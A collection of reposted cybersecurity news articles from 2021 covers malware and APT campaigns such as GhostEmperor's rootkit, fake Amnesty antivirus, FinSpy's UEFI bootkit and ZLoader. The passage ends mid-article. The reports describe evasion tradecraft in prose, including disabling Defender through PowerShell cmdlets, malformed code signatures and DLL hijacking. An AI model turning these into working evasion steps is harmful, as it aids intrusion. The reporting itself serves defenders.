"With the resources of a nation-state level threat group, it's possible to create a truly staggering level of diversity in their infrastructure," the researchers said, adding by piecing together the malicious activities of the threat actor via public sharing of information, it's possible to "uncover the tracks that the cybercriminals involved worked so hard to hide."
Chinese Hackers Used a New Rootkit to Spy on Targeted Windows 10 Users
6.10.21 Virus
Thehackernews
A formerly unknown Chinese-speaking threat actor has been linked to a
long-standing evasive operation aimed at South East Asian targets as far back as
July 2020 to deploy a kernel-mode rootkit on compromised Windows systems.
Attacks mounted by the hacking group, dubbed GhostEmperor by Kaspersky, are also said to have used a "sophisticated multi-stage malware framework" that allows for providing persistence and remote control over the targeted hosts.
The Russian cybersecurity firm called the rootkit Demodex, with infections reported across several high-profile entities in Malaysia, Thailand, Vietnam, and Indonesia, in addition to outliers located in Egypt, Ethiopia, and Afghanistan.
"[Demodex] is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting undocumented loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism," Kaspersky researchers said.
GhostEmperor infections have been found to leverage multiple intrusion routes that culminate in the execution of malware in memory, chief among them being exploiting known vulnerabilities in public-facing servers such as Apache, Window IIS, Oracle, and Microsoft Exchange — including the ProxyLogon exploits that came to light in March 2021 — to gain an initial foothold and laterally pivot to other parts of the victim's network, even on machines running recent versions of the Windows 10 operating system.
Following a successful breach, select infection chains that resulted in the
deployment of the rootkit were carried out remotely via another system in the
same network using legitimate software such as WMI or PsExec, leading to the
execution of an in-memory implant capable of installing additional payloads
during run time.
Notwithstanding its reliance on obfuscation and other detection-evasion methods to elude discovery and analysis, Demodex gets around Microsoft's Driver Signature Enforcement mechanism to permit the execution of unsigned, arbitrary code in kernel space by leveraging a legitimate and open-source signed driver named "dbk64.sys" that's shipped alongside Cheat Engine, an application used to introduce cheats into video games.
"With a long-standing operation, high profile victims, [and] advanced toolset […] the underlying actor is highly skilled and accomplished in their craft, both of which are evident through the use of a broad set of unusual and sophisticated anti-forensic and anti-analysis techniques," the researchers said.
The disclosure comes as a China-linked threat actor codenamed TAG-28 has been discovered as being behind intrusions against Indian media and government agencies such as The Times Group, the Unique Identification Authority of India (UIDAI), and the police department of the state of Madhya Pradesh.
Recorded Future, earlier this week, also unearthed malicious activity targeting a mail server of Roshan, one of Afghanistan's largest telecommunications providers, that it attributed to four distinct Chinese state-sponsored actors — RedFoxtrot, Calypso APT, as well as two separate clusters using backdoors associated with the Winnti and PlugX groups.
Beware of Fake Amnesty International Antivirus for Pegasus that Hacks PCs with
Malware
6.10.21
Virus
Thehackernews
In yet another indicator of how hacking groups are quick to capitalize on world events and improvise their attack campaigns for maximum impact, threat actors have been discovered impersonating Amnesty International to distribute malware that purports to be security software designed to safeguard against NSO Group's Pegasus surveillanceware.
"Adversaries have set up a phony website that looks like Amnesty International's — a human rights-focused non-governmental organization — and points to a promised antivirus tool to protect against the NSO Group's Pegasus tool," Cisco Talos researchers said. "However, the download actually installs the little-known Sarwent malware."
The countries most affected by the campaign include the U.K., the U.S., Russia, India, Ukraine, Czech Republic, Romania, and Colombia. While it's unclear as to how the victims are lured into visiting the fake Amnesty International website, the cybersecurity firm surmised the attacks could be aimed at users who may be specifically searching for protection against this threat.
The development comes on the heels of an explosive investigation in July 2021
that revealed widespread abuse of the Israeli company's Pegasus "military-grade
spyware" to facilitate human rights violations by surveilling heads of state,
activists, journalists, and lawyers around the world. The NGO has since also
released a Mobile Verification Toolkit (MVT) to help individuals scan their
iPhone and Android devices for evidence of compromise.
Besides making use of social engineering tricks by designing a rogue website with an identical look and feel of Amnesty International's legitimate online portal, the modus operandi aims to trick the visitor into downloading an "Amnesty Anti Pegasus Software" under the guise of an antivirus tool that features capabilities to enable the bad actor find way a remote way into the compromised machine and exfiltrate sensitive information, such as login credentials.
The Sarwent sample used in the low-volume campaign is a highly-customized
variant coded in Delphi and is capable of allowing remote desktop access through
VNC or RDP and executing command line or PowerShell instructions received from
an attacker-controlled domain, the results of which are sent back to the server.
Talos attributed the infections with high confidence to a Russian-speaking actor locating in the country and known for mounting attacks involving the Sarwent backdoor since at least January 2021 sprawling across a variety of victims, noting the level of modifications made to the supposed antivirus as likely evidence that "the operator has access to the source code of the Sarwent malware."
"The campaign targets people who might be concerned that they are targeted by the Pegasus spyware," the researchers said. "This targeting raises issues of possible state involvement, but there is insufficient information […] to make any determination on which state or nation. It is possible that this is simply a financially motivated actor looking to leverage headlines to gain new access."
New Tomiris Backdoor Found Linked to Hackers Behind SolarWinds Cyberattack
6.10.21
Virus
Thehackernews
Cybersecurity researchers on Wednesday disclosed a previously undocumented
backdoor likely designed and developed by the Nobelium advanced persistent
threat (APT) behind last year's SolarWinds supply chain attack, joining the
threat actor's ever-expanding arsenal of hacking tools.
Moscow-headquartered firm Kaspersky codenamed the malware "Tomiris," calling out its similarities to another second-stage malware used during the campaign, SUNSHUTTLE (aka GoldMax), targeting the IT management software provider's Orion platform. Nobelium is also known by the monikers UNC2452, SolarStorm, StellarParticle, Dark Halo, and Iron Ritual.
"While supply-chain attacks were already a documented attack vector leveraged by a number of APT actors, this specific campaign stood out due to the extreme carefulness of the attackers and the high-profile nature of their victims," Kaspersky researchers said. "Evidence gathered so far indicates that Dark Halo spent six months inside Orion IT's networks to perfect their attack and make sure that their tampering of the build chain wouldn't cause any adverse effects."
Microsoft, which detailed SUNSHUTTLE in March 2021, described the strain as a
Golang-based malware that acts as a command-and-control backdoor, establishing a
secure connection with an attacker-controlled server to fetch and execute
arbitrary commands on the compromised machine as well as exfiltrate files from
the system to the server.
The new Tomiris backdoor, found by Kaspersky in June this year from samples dating back to February, is also written in Go and deployed via a successful DNS hijacking attack during which targets attempting to access the login page of a corporate email service were redirected to a fraudulent domain set up with a lookalike interface designed to trick the visitors into downloading the malware under the guise of a security update.
The attacks are believed to have been mounted against several government organizations in an unnamed CIS member state.
"The main purpose of the backdoor was to establish a foothold in the attacked system and to download other malicious components," the researchers said, in addition to finding a number of similarities ranging from the encryption scheme to the same spelling mistakes that collectively hint at the "possibility of common authorship or shared development practices."
This is not the first time overlaps have been discovered between different tools put to use by the threat actor. Earlier this year, Kaspersky's analysis of Sunburst revealed a number of shared features between the malware and Kazuar, a .NET-based backdoor attributed to the Turla group. Interestingly, the cybersecurity company said it detected Tomiris in networks where other machines were infected with Kazuar, adding weight to prospects that the three malware families could be linked to each other.
Having said that, the researchers pointed out it could also be a case of a false flag attack, wherein threat actors deliberately reproduce the tactics and techniques adopted by a known adversary in an attempt to mislead attribution.
The revelation comes days after Microsoft took the wraps of a passive and highly targeted implant dubbed FoggyWeb that was employed by the Nobelium group to deliver additional payloads and steal sensitive information from Active Directory Federation Services (AD FS) servers.
New FinSpy Malware Variant Infects Windows Systems With UEFI Bootkit
6.10.21
Virus
Thehackernews
Commercially developed FinFisher surveillanceware has been upgraded to infect
Windows devices using a UEFI (Unified Extensible Firmware Interface) bootkit
that leverages a trojanized Windows Boot Manager, marking a shift in infection
vectors that allow it to elude discovery and analysis.
Detected in the wild since 2011, FinFisher (aka FinSpy or Wingbird) is a spyware toolset for Windows, macOS, and Linux developed by Anglo-German firm Gamma International and supplied exclusively to law enforcement and intelligence agencies. But like with NSO Group's Pegasus, the software has also been used to spy on Bahraini activists in the past allegedly and delivered as part of spear-phishing campaigns in September 2017.
FinFisher is equipped to harvest user credentials, file listings, sensitive documents, record keystrokes, siphon email messages from Thunderbird, Outlook, Apple Mail, and Icedove, intercept Skype contacts, chats, calls and transferred files, and capture audio and video by gaining access to a machine's microphone and webcam.
While the tool was previously deployed through tampered installers of legitimate applications such as TeamViewer, VLC, and WinRAR that were backdoored with an obfuscated downloader, subsequent updates in 2014 enabled infections via Master Boot Record (MBR) bootkits with the goal of injecting a malicious loader in a manner that's engineered to slip past security tools.
The latest feature to be added is the ability to deploy a UEFI bootkit to load FinSpy, with new samples exhibiting properties that replaced the Windows UEFI boot loader with a malicious variant as well as boasting of four layers of obfuscation and other detection-evasion methods to slow down reverse engineering and analysis.
"This way of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks," Kaspersky's Global Research and Analysis Team (GReAT) said in a technical deep dive following an eight-month-long investigation. "UEFI infections are very rare and generally hard to execute, they stand out due to their evasiveness and persistence."
UEFI is a firmware interface and an improvement over basic input/output system (BIOS) with support for Secure Boot, which ensures the integrity of the operating system to ascertain no malware has interfered with the boot process. But because UEFI facilitates the loading of the operating system itself, bootkit infections are not only resistant to OS reinstallation or replacement of the hard drive but are also inconspicuous to security solutions running within the operating system.
This enables threat actors to have control over the boot process, achieve persistence, and bypass all security defences. "While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy, as the malicious module was installed on a separate partition and could control the boot process of the infected machine," the researchers added.
New BloodyStealer Trojan Steals Gamers' Epic Games and Steam Accounts
6.10.21
Virus
Thehackernews
A new advanced trojan sold on Russian-speaking underground forums comes with
capabilities to steal users' accounts on popular online video game distribution
services, including Steam, Epic Games Store, and EA Origin, underscoring a
growing threat to the lucrative gaming market.
Cybersecurity firm Kaspersky, which coined the malware "BloodyStealer," said it first detected the malicious tool in March 2021 as being advertised for sale at an attractive price of 700 RUB (less than $10) for one month or $40 for a lifetime subscription. Attacks using Bloody Stealer have been uncovered so far in Europe, Latin America, and the Asia-Pacific region.
"BloodyStealer is a Trojan-stealer capable of gathering and exfiltrating various
types of data, for cookies, passwords, forms, banking cards from browsers,
screenshots, log-in memory, and sessions from various applications," the company
said. The information harvested from gaming apps, such as Bethesda, Epic Games,
GOG, Origin, Steam, and VimeWorld, is exfiltrated to a remote server, from where
it's likely to be monetized on darknet platforms or Telegram channels that are
dedicated to selling access to online gaming accounts.
The malware is not only aimed at VIP members of underground forums, but also stands out for a barrage of anti-analysis methods it uses to thwart detection and intentionally complicate reverse engineering. Furthermore, infection chains involving BloodyStealer are also noteworthy for the fact that threat actors who had purchased a license to the product used the stealer in conjunction with other malware campaigns.
Kaspersky did not reveal the attack vectors used to stage the incursions, but it's typical of adversaries to target users looking to download games from fraudulent sites or through email and chat messages containing links to external rogue sites that trick gamers into entering their account information.
"BloodyStealer is a prime example of an advanced tool used by cybercriminals to penetrate the gaming market," the researchers said. "With its interesting capabilities, such as extraction of browser passwords, cookies, and environment information as well as grabbing information related to online gaming platforms, BloodyStealer provides value in terms of data that can be stolen from gamers and later sold on the darknet."
Microsoft Warns of FoggyWeb Malware Targeting Active Directory FS Servers
6.10.21
Virus
Thehackernews
Microsoft on Monday revealed new malware deployed by the hacking group behind
the SolarWinds supply chain attack last December to deliver additional payloads
and steal sensitive information from Active Directory Federation Services (AD
FS) servers.
The tech giant's Threat Intelligence Center (MSTIC) codenamed the "passive and highly targeted backdoor" FoggyWeb, making it the threat actor tracked as Nobelium's latest tool in a long list of cyber weaponry such as Sunburst, Sunspot, Raindrop, Teardrop, GoldMax, GoldFinder, Sibot, Flipflop, NativeZone, EnvyScout, BoomBox, and VaporRage.
"Once Nobelium obtains credentials and successfully compromises a server, the actor relies on that access to maintain persistence and deepen its infiltration using sophisticated malware and tools," MSTIC researchers said. "Nobelium uses FoggyWeb to remotely exfiltrate the configuration database of compromised AD FS servers, decrypted token-signing certificate, and token-decryption certificate, as well as to download and execute additional components."
Microsoft said it observed FoggyWeb in the wild as early as April 2021,
describing the implant as a "malicious memory-resident DLL."
Nobelium is the moniker assigned by the company to the nation-state hacking group widely known as APT29, The Dukes, or Cozy Bear — an advanced persistent threat that has been attributed to Russia's Foreign Intelligence Service (SVR) — and believed to have been behind the wide-ranging attack targeting SolarWinds that came to light in December 2020. The adversary behind this campaign is also being monitored under a variety of codenames like UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Iron Ritual (Secureworks).
FoggyWeb, installed using a loader by exploiting a technique called DLL search order hijacking, is capable of transmitting sensitive information from a compromised AD FS server as well as receive and execute additional malicious payloads retrieved from a remote attacker-controlled server. It's also engineered to monitor all incoming HTTP GET and POST requests sent to the server from the intranet (or internet) and intercept HTTP requests that are of interest to the actor.
"Protecting AD FS servers is key to mitigating Nobelium attacks," the researchers said. "Detecting and blocking malware, attacker activity, and other malicious artifacts on AD FS servers can break critical steps in known Nobelium attack chains. Customers should review their AD FS Server configuration and implement changes to secure these systems from attacks."
A New Jupyter Malware Version is Being Distributed via MSI Installers
6.10.21 Virus
Thehackernews
Cybersecurity researchers have charted the evolution of Jupyter, a .NET
infostealer known for singling out healthcare and education sectors, which make
it exceptional at defeating most endpoint security scanning solutions.
The new delivery chain, spotted by Morphisec on September 8, underscores that the malware has not just continued to remain active but also showcases "how threat actors continue to develop their attacks to become more efficient and evasive." The Israeli company said it's currently investigating the scale and scope of the attacks.
First documented in November 2020, Jupyter (aka Solarmarker) is likely Russian in origin and primarily targets Chromium, Firefox, and Chrome browser data, with additional capabilities that allow for full backdoor functionality, including features to siphon information and upload the details to a remote server and download and execute further payloads. Forensic evidence gathered by Morphisec shows that multiple versions of Jupyter began emerging starting May 2020.
In August 2021, Cisco Talos attributed the intrusions to a "fairly sophisticated actor largely focused on credential and residual information theft." Cybersecurity firm CrowdStrike, earlier this February, described the malware as packing a multi-stage, heavily obfuscated PowerShell loader, which leads to the execution of a .NET compiled backdoor.
While previous attacks incorporated legitimate binaries of well-known software such as Docx2Rtf and Expert PDF, the latest delivery chain puts to use another PDF application called Nitro Pro. The attacks start with a deployment of an MSI installer payload that's over 100MB in size, allowing them to bypass anti-malware engines, and obfuscated using a third-party application packaging wizard called Advanced Installer.
Running the MSI payload leads to the execution of a PowerShell loader embedded within a legitimate binary of Nitro Pro 13, two variants of which have been observed signed with a valid certificate belonging to an actual business in Poland, suggesting a possible certificate impersonation or theft. The loader, in the final-stage, decodes and runs the in-memory Jupyter .NET module.
"The evolution of the Jupyter infostealer/backdoor from when we first identified it in 2020 proves the truth of the statement that threat actors are always innovating," Morphisec researcher Nadav Lorber said. "That this attack continues to have low or no detections on VirusTotal further indicates the facility with which threat actors evade detection-based solutions."
Google Warns of a New Way Hackers Can Make Malware Undetectable on Windows
6.10.21
Virus
Thehackernews
Cybersecurity researchers have disclosed a novel technique adopted by a threat
actor to deliberately evade detection with the help of malformed digital
signatures of its malware payloads.
"Attackers created malformed code signatures that are treated as valid by Windows but are not able to be decoded or checked by OpenSSL code — which is used in a number of security scanning products," Google Threat Analysis Group's Neel Mehta said in a write-up published on Thursday.
The new mechanism was observed to be exploited by a notorious family of unwanted software known as OpenSUpdater that's used to download and install other suspicious programs on compromised systems. Most targets of the campaign are users located in the U.S. who are prone to downloading cracked versions of games and other grey-area software.
The findings come from a set of OpenSUpdater samples uploaded to VirusTotal at least since mid-August.
While adversaries in the past have relied on illegally obtained digital certificates to sneak adware and other unwanted software past malware detection tools or by embedding the attack code into digitally signed, trusted software components by poisoning the software supply chain, OpenSUpdater stands out for its intentional use of malformed signature to slip through defenses.
The artifacts are signed with an invalid leaf X.509 certificate that's edited in
such a manner that the 'parameters' element of the SignatureAlgorithm field
included an End-of-Content (EOC) marker instead of a NULL tag. Although such
encodings are rejected as invalid by products using OpenSSL to retrieve
signature information, checks on Windows systems would permit the file to be run
without any security warnings.
"This is the first time TAG has observed actors using this technique to evade detection while preserving a valid digital signature on PE files," Mehta said.
"Code signatures on Windows executables provide guarantees about the integrity of a signed executable, as well as information about the identity of the signer. Attackers who are able to obscure their identity in signatures without affecting the integrity of the signature can avoid detection longer and extend the lifetime of their code-signing certificates to infect more systems."
New Capoae Malware Infiltrates WordPress Sites and Installs Backdoored Plugin
6.10.21
Virus
Thehackernews
A recently discovered wave of malware attacks has been spotted using a variety of tactics to enslave susceptible machines with easy-to-guess administrative credentials to co-opt them into a network with the goal of illegally mining cryptocurrency.
"The malware's primary tactic is to spread by taking advantage of vulnerable systems and weak administrative credentials. Once they've been infected, these systems are then used to mine cryptocurrency," Akamai security researcher Larry Cashdollar said in a write-up published last week.
The PHP malware — codenamed "Capoae" (short for "Сканирование," the Russian word
for "Scanning") — is said to be delivered to the hosts via a backdoored addition
to a WordPress plugin called "download-monitor," which gets installed after
successfully brute-forcing WordPress admin credentials. The attacks also involve
the deployment of a Golang binary with decryption functionality, with the
obfuscated payloads retrieved by leveraging the trojanized plugin to make a GET
request from an actor-controlled domain.
Also included is a feature to decrypted and execute additional payloads, while the Golang binary takes advantage of exploits for multiple remote code execution flaws in Oracle WebLogic Server (CVE-2020-14882), NoneCms (CVE-2018-20062), and Jenkins (CVE-2019-1003029 and CVE-2019-1003030) to brute force its way into systems running SSH and ultimately launch the XMRig mining software.
What's more, the attack chain stands out for its persistence tricks, which includes choosing a legitimate-looking system path on the disk where system binaries are likely to be found as well as generating a random six-character filename that's then subsequently used to copy itself into the new location on the system before deleting the malware upon execution.
"The Capoae campaign's use of multiple vulnerabilities and tactics highlights just how intent these operators are on getting a foothold on as many machines as possible," Cashdollar said. "The good news is, the same techniques we recommend for most organizations to keep systems and networks secure still apply here."
"Don't use weak or default credentials for servers or deployed applications," Cashdollar added. "Ensure you're keeping those deployed applications up to date with the latest security patches and check in on them from time to time. Keeping an eye out for higher than normal system resource consumption, odd/unexpected running processes, suspicious artifacts and suspicious access log entries, etc., will help you potentially identify compromised machines."
A New Wave of Malware Attack Targeting Organizations in South America
6.10.21
Virus
Thehackernews
A spam campaign delivering spear-phishing emails aimed at South American organizations has retooled its techniques to include a wide range of commodity remote access trojans (RATs) and geolocation filtering to avoid detection, according to new research.
Cybersecurity firm Trend Micro attributed the attacks to an advanced persistent threat (APT) tracked as APT-C-36 (aka Blind Eagle), a suspected South America espionage group that has been active since at least 2018 and previously known for setting its sights on Colombian government institutions and corporations spanning financial, petroleum, and manufacturing sectors.
Primarily spread via fraudulent emails by masquerading as Colombian government agencies, such as the National Directorate of Taxes and Customs (DIAN), the infection chain commences when the message recipients open a decoy PDF or Word document that claims to be a seizure order tied to their bank accounts and click on a link that's been generated from a URL shortener service like cort.as, acortaurl.com, and gtly.to.
"These URL shorteners are capable of geographical targeting, so if a user from a country not targeted by the threat actors clicks on the link, they will be redirected to a legitimate website," Trend Micro researchers detailed in a report published last week. "The URL shorteners also have the ability to detect the major VPN services, in which case, the shortened link leads the users to a legitimate website instead of redirecting them to the malicious link."
Should the victim meet the location criteria, the user is redirected to a file hosting server, and a password-protected archive is automatically downloaded, the password for which is specified in the email or the attachment, ultimately leading to the execution of a C++-based remote access trojan called BitRAT that first came to light in August 2020.
Multiple verticals, including government, financial, healthcare, telecommunications, and energy, oil, and gas, are said to have been affected, with a majority of the targets for the latest campaign located in Colombia and a smaller fraction also coming from Ecuador, Spain, and Panama.
"APT-C-36 selects their targets based on location and most likely the financial standing of the email recipient," the researchers said. "These, and the prevalence of the emails, lead us to conclude that the threat actor's ultimate goal is financial gain rather than espionage."
Numando: A New Banking Trojan Targeting Latin American Users
20.9.21
Virus
Thehackernews
A newly spotted
banking trojan has been caught leveraging legitimate platforms like YouTube and
Pastebin to store its encrypted, remote configuration and commandeer infected
Windows systems, making it the latest to join the long list of malware targeting
Latin America (LATAM) after Guildma, Javali, Melcoz, Grandoreiro, Mekotio,
Casbaneiro, Amavaldo, Vadokrist, and Janeleiro.
The threat actor behind this malware family — dubbed "Numando" — is believed to have been active since at least 2018.
"[Numando brings] interesting new techniques to the pool of Latin American banking trojans' tricks, like using seemingly useless ZIP archives or bundling payloads with decoy BMP images," ESET researchers said in a technical analysis published on Friday. "Geographically, it focuses almost exclusively on Brazil with rare campaigns in Mexico and Spain."
Written in Delphi, the malware comes with an array of backdoor capabilities that allow it to control compromised machines, simulate mouse and keyboard actions, restart and shutdown the host, display overlay windows, capture screenshots, and terminate browser processes. Numando is "almost exclusively" propagated by spam campaigns, ensnaring several hundred victims to date, according to the cybersecurity firm's telemetry data.
The attacks begin with a phishing message that comes embedded with a ZIP
attachment containing an MSI installer, which, in turn, includes a cabinet
archive with a legitimate application, an injector, and an encrypted Numando
banking trojan DLL. Executing the MSI leads to the execution of the application,
causing the injector module to be side-loaded and decrypt the final-stage
malware payload.
In an alternate distribution chain observed by ESET, the malware takes the form of a "suspiciously large" but valid BMP image file, from which the injector extracts and executes the Numando banking trojan. What makes the campaign stand out is its use of YouTube video titles and descriptions — now taken down — to store the remote configuration such as the IP address of the command-and-control server.
"[The malware] uses fake overlay windows, contains backdoor functionality, and utilizes MSI [installer]," the researchers said. "It is the only LATAM banking trojan written in Delphi that uses a non-Delphi injector and its remote configuration format is unique, making two reliable factors when identifying this malware family."
New Malware Targets Windows Subsystem for Linux to Evade Detection
19.9.21 Virus
Thehackernews
A number of malicious
samples have been created for the Windows Subsystem for Linux (WSL) with the
goal of compromising Windows machines, highlighting a sneaky method that allows
the operators to stay under the radar and thwart detection by popular
anti-malware engines.
The "distinct tradecraft" marks the first instance where a threat actor has been found abusing WSL to install subsequent payloads.
"These files acted as loaders running a payload that was either embedded within the sample or retrieved from a remote server and was then injected into a running process using Windows API calls," researchers from Lumen Black Lotus Labs said in a report published on Thursday.
Windows Subsystem for Linux, launched in August 2016, is a compatibility layer that's designed to run Linux binary executables (in ELF format) natively on the Windows platform without the overhead of a traditional virtual machine or dual-boot setup.
The earliest artifacts date back to May 3, 2021, with a series of Linux binaries
uploaded every two to three weeks till August 22, 2021. Not only are the samples
written in Python 3 and converted into an ELF executable with PyInstaller, but
the files are also orchestrated to download shellcode from a remote
command-and-control server and employ PowerShell to carry out follow-on
activities on the infected host.
This secondary "shellcode" payload is then injected into a running Windows process using Windows API calls for what Lumen described as "ELF to Windows binary file execution," but not before the sample attempts to terminate suspected antivirus products and analysis tools running on the machine. What's more, the use of standard Python libraries makes some of the variants interoperable on both Windows and Linux.
"Thus far, we have identified a limited number of samples with only one publicly routable IP address, indicating that this activity is quite limited in scope or potentially still in development," the researchers said. "As the once distinct boundaries between operating systems continue to become more nebulous, threat actors will take advantage of new attack surfaces."
Malware Attack on Aviation Sector Uncovered After Going Unnoticed for 2 Years
19.9.21
Virus
Thehackernews
A targeted phishing campaign aimed at the aviation industry for two years may be spearheaded by a threat actor operating out of Nigeria, highlighting how attackers can carry out small-scale cyber offensives for extended periods of time while staying under the radar.
Cisco Talos dubbed the malware attacks "Operation Layover," building on previous research from the Microsoft Security Intelligence team in May 2021 that delved into a "dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT."
"The actor […] doesn't seem to be technically sophisticated, using off-the-shelf
malware since the beginning of its activities without developing its own
malware," researchers Tiago Pereira and Vitor Ventura said. "The actor also buys
the crypters that allow the usage of such malware without being detected,
throughout the years it has used several different cryptors, mostly bought on
online forums."
The threat actor is believed to have been active at least since 2013. The attacks involve emails containing specific lure documents centered around the aviation or cargo industry that purport to be PDF files but link to a VBScript file hosted on Google Drive, which ultimately leads to the delivery of remote access trojans (RATs) like AsyncRAT and njRAT, leaving organizations vulnerable to an array of security risks. Cisco Talos said it found 31 different aviation-themed lures dating all the way back to August 2018.
Further analysis of the activity associated with different domains used in the attacks show that the actor weaved multiple RATs into their campaigns, with the infrastructure used as command-and-control (C2) servers for Cybergate RAT, AsyncRAT, and a batch file that's used as part of a malware chain to download and execute other malware.
"Many actors can have limited technical knowledge but still be able to operate RATs or information-stealers, posing a significant risk to large corporations given the right conditions," the researchers said. "In this case, […] what seemed like a simple campaign is, in fact, a continuous operation that has been active for three years, targeting an entire industry with off-the-shelf malware disguised with different crypters."
New Stealthier ZLoader Variant Spreading Via Fake TeamViewer Download Ads
19.9.21
Virus
Thehackernews
Users searching for TeamViewer remote desktop software on search engines like Google are being redirected to malicious links that drop ZLoader malware onto their systems while simultaneously embracing a stealthier infection chain that allows it to linger on infected devices and evade detection by security solutions.
"The malware is downloaded from a Google advertisement published through Google Adwords," researchers from SentinelOne said in a report published on Monday. "In this campaign, the attackers use an indirect way to compromise victims instead of using the classic approach of compromising the victims directly, such as by phishing."
First discovered in 2016, ZLoader (aka Silent Night and ZBot) is a fully-featured banking trojan and a fork of another banking malware called ZeuS, with newer versions implementing a VNC module that grants adversaries remote access to victim systems. The malware is in active development, with criminal actors spawning an array of variants in recent years, no less fuelled by the leak of ZeuS source code in 2011.
The latest wave of attacks is believed to target users of Australian and German
financial institutions with the primary goal of intercepting users' web requests
to the banking portals and stealing bank credentials. But the campaign is also
noteworthy because of the steps it takes to stay under the radar, including
running a series of commands to hide the malicious activity by disabling Windows
Defender.
The infection chain commences when a user clicks on an advertisement shown by Google on the search results page and is redirected to the fake TeamViewer site under the attacker's control, thus tricking the victim into downloading a rogue but signed variant of the software ("Team-Viewer.msi"). The fake installer acts as the first stage dropper to trigger a series of actions that involve downloading next-stage droppers aimed at impairing the defenses of the machine and finally downloading the ZLoader DLL payload ("tim.dll").
"At first, it disables all the Windows Defender modules through the PowerShell cmdlet Set-MpPreference," SentinelOne Senior Threat Intelligence Researcher Antonio Pirozzi said. "It then adds exclusions, such as regsvr32, *.exe, *.dll, with the cmdlet Add-MpPreference to hide all the components of the malware from Windows Defender."
The cybersecurity firm said it found additional artifacts that mimic popular apps like Discord and Zoom, suggesting that the attackers had multiple campaigns ongoing beyond leveraging TeamViewer.
"The attack chain analyzed in this research shows how the complexity of the attack has grown in order to reach a higher level of stealthiness, using an alternative to the classic approach of compromising victims through phishing emails," Pirozzi explained. "The technique used to install the first stage dropper has been changed from socially engineering the victim into opening a malicious document to poisoning the user's web searches with links that deliver a stealthy, signed MSI payload."
This New Malware Family Using CLFS Log Files to Avoid Detection
3.9.21
Virus
Thehackernews
Cybersecurity
researchers have disclosed details about a new malware family that relies on the
Common Log File System (CLFS) to hide a second-stage payload in registry
transaction files in an attempt to evade detection mechanisms.
FireEye's Mandiant Advanced Practices team, which made the discovery, dubbed the malware PRIVATELOG, and its installer, STASHLOG. Specifics about the identities of the threat actor or their motives remain unclear.
Although the malware is yet to be detected in real-world attacks aimed at customer environments or be spotted launching any second-stage payloads, Mandiant suspects that PRIVATELOG could still be in development, the work of a researcher, or deployed as part of a highly targeted activity.
CLFS is a general-purpose logging subsystem in Windows that's accessible to both kernel-mode as well as user-mode applications such as database systems, OLTP systems, messaging clients, and network event management systems for building and sharing high-performance transaction logs.
"Because the file format is not widely used or documented, there are no
available tools that can parse CLFS log files," Mandiant researchers explained
in a write-up published this week. "This provides attackers with an opportunity
to hide their data as log records in a convenient way, because these are
accessible through API functions."
PRIVATELOG and STASHLOG come with capabilities that allow the malicious software to linger on infected devices and avoid detection, including the use of obfuscated strings and control flow techniques that are expressly designed to make static analysis cumbersome. What's more, the STASHLOG installer accepts a next-stage payload as an argument, the contents of which are subsequently stashed in a specific CLFS log file.
Fashioned as an un-obfuscated 64-bit DLL named "prntvpt.dll," PRIVATELOG, in contrast, leverages a technique called DLL search order hijacking in order to load the malicious library when it is called by a victim program, in this case, a service called "PrintNotify."
"Similarly to STASHLOG, PRIVATELOG starts by enumerating *.BLF files in the default user's profile directory and uses the .BLF file with the oldest creation date timestamp," the researchers noted, before using it to decrypt and store the second-stage payload.
Mandiant recommends that organizations apply YARA rules to scan internal networks for signs of malware and watch out for potential Indicators of Compromise (IoCs) in "process", "imageload" or "filewrite" events associated with endpoint detection and response (EDR) system logs.
FIN7 Hackers Using Windows 11 Themed Documents to Drop Javascript Backdoor
3.9.21 Virus
Thehackernews
A recent wave of spear-phishing campaigns leveraged weaponized Windows 11
Alpha-themed Word documents with Visual Basic macros to drop malicious payloads,
including a JavaScript implant, against a point-of-sale (PoS) service provider
located in the U.S.
The attacks, which are believed to have taken place between late June to late July 2021, have been attributed with "moderate confidence" to a financially motivated threat actor dubbed FIN7, according to researchers from cybersecurity firm Anomali.
"The specified targeting of the Clearmind domain fits well with FIN7's preferred modus operandi," Anomali Threat Research said in a technical analysis published on September 2. "The group's goal appears to have been to deliver a variation of a JavaScript backdoor used by FIN7 since at least 2018."
An Eastern European group active since at least mid-2015, FIN7 has a checkered history of targeting restaurant, gambling, and hospitality industries in the U.S. to plunder financial information such as credit and debit card numbers that were then used or sold for profit on underground marketplaces.
Although multiple members of the collective have been imprisoned for their roles
in different campaigns since the start of the year, FIN7's activities have also
been tied to another group called Carbanak, given its similar TTPs, with the
main distinction being that while FIN7 focuses on hospitality and retail
sectors, Carbanak has singled out banking institutions.
In the latest attack observed by Anomali, the infection commences with a Microsoft Word maldoc containing a decoy image that's purported to have been "made on Windows 11 Alpha," urging the recipient to enable macros to trigger the next stage of activity, which involves executing a heavily-obfuscated VBA macro to retrieve a JavaScript payload, which has been found to share similar functionality with other backdoors used by FIN7.
Besides taking several steps to try to impede analysis by populating the code with junk data, the VB script also checks if it is running under a virtualized environment such as VirtualBox and VMWare, and if so, terminates itself, in addition to stopping the infection chain upon detecting Russian, Ukrainian, or several other Eastern European languages.
The backdoor's attribution to FIN7 stems from overlaps in the victimology and techniques adopted by the threat actor, including the use of a JavaScript-based payload to plunder valuable information.
"FIN7 is one of the most notorious financially motivated groups due to the large amounts of sensitive data they have stolen through numerous techniques and attack surfaces," the researchers said. "Things have been turbulent for the threat group over the past few years as with success and notoriety comes the ever-watchful eye of the authorities. Despite high-profile arrests and sentencing, including alleged higher-ranking members, the group continues to be as active as ever."
Cybercriminals Abusing Internet-Sharing Services to Monetize Malware Campaigns
3.9.21
Virus
Thehackernews
Threat actors are capitalizing on the growing popularity of proxyware platforms like Honeygain and Nanowire to monetize their own malware campaigns, once again illustrating how attackers are quick to repurpose and weaponize legitimate platforms to their advantage.
"Malware is currently leveraging these platforms to monetize the internet bandwidth of victims, similar to how malicious cryptocurrency mining attempts to monetize the CPU cycles of infected systems," researchers from Cisco Talos said in a Tuesday analysis. "In many cases, these applications are featured in multi-stage, multi-payload malware attacks that provide adversaries with multiple monetization methods."
Proxyware, also called internet-sharing applications, are legitimate services
